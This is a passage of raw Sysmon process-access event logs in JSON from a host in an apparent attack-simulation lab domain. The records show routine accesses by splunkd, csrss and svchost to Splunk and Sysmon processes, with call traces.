(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2079-5F25-0000-001003350600}","TargetProcessId":"3308","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2079-5F25-0000-001003350600}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2079-5F25-0000-001003350600}","TargetProcessId":"3308","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
